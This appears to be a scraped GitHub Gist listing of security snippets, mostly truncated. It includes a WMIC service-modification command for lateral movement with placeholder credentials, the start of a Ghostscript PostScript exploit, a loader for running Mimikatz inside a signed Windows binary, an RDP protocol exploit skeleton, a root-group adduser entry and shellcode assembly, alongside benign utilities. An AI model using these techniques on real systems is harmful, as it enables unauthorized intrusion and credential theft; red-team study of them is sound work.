:shipit:
Wait, did I stream that out loud?

Aekr1_ //akrasia 0x25bit

@Ridter
Ridter / wmicLateralMovement.txt
Created December 17, 2019 11:51 — forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be more convenient as it automates the below steps. However, for one-offs this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line to form one large block.
Step 1: Get the current pathName of your target service so we can restore it once we've run our command (in our case XblAuthManager)
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName
@odzhan
odzhan / kitty.c
Created December 7, 2019 08:56
KITTY Compression Algorithm
//
// KITTY compression algorithm, by snowcat
// converted to C, by odzhan
// 2019-12-07
//
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <time.h>
@adiroiban
adiroiban / powershell.sh
Created December 2, 2019 10:53
Change RDP port - Azure script
param($RDPPort=3389)
$TSPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$RDPTCPpath = $TSPath + '\Winstations\RDP-Tcp'
Set-ItemProperty -Path $TSPath -name 'fDenyTSConnections' -Value 0
# RDP port
$portNumber = (Get-ItemProperty -Path $RDPTCPpath -Name 'PortNumber').PortNumber
Write-Host Get RDP PortNumber: $portNumber
if (!($portNumber -eq $RDPPort))
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
@Ridter
Ridter / exp.ps
Created September 23, 2019 08:45
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% just copy from https://gist.github.com/hhc0null/82bf2e57ac93c1a48115a1b4afcde706
/exploit {
/println { (\\n) exch print print } bind executeonly def
/info { ([*] ) print println } bind executeonly def
/success { ([+] ) print println } bind executeonly def
/fail { ([-] ) print println stop } bind executeonly def
/MaxFileSize 16#10000 def
/readfile {
@Ridter
Ridter / Tasks.cs
Created August 3, 2019 08:03
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
@taviso
taviso / msdn.sh
Created July 12, 2019 22:30
Read MSDN pages in a terminal.
# man equivalent for msdn pages so I can look them up in the console.
function msdn()
{
    local lucky="https://www.google.com/search?btnI"
    local query="q=site:docs.microsoft.com+inurl:/en-us/windows/desktop/"
    local title="Microsoft Developer Network"
    local cache="${HOME}/.msdn/"
    if ! type lynx > /dev/null; then
        echo "error: lynx is not installed, please install it." 1>&2
import socket, sys
from OpenSSL import SSL
from impacket.structure import Structure
class TPKT(Structure):
    header = (
        ('Version','B=3'),
        ('Reserved','B=0'),
        ('Length','>H=len(TPDU)+4'),
        ('_TPDU','_-TPDU','self["Length"]-4'),
@NullArray
NullArray / adduser.c
Created March 31, 2019 03:28
add user with GID 0 in *nix
@wideglide
wideglide / shellcode_decrypt.asm
Created March 27, 2019 22:11
encryptor shellcode
;--------------------------------------------
; Name: Josh Bundt
; Class: IA6120
; Assignment 9
; File: decrypt_uuid.asm
; Last modified: 19 Mar 2019
;---------------------------------------------
; nasm -f bin decrypt_uuid.asm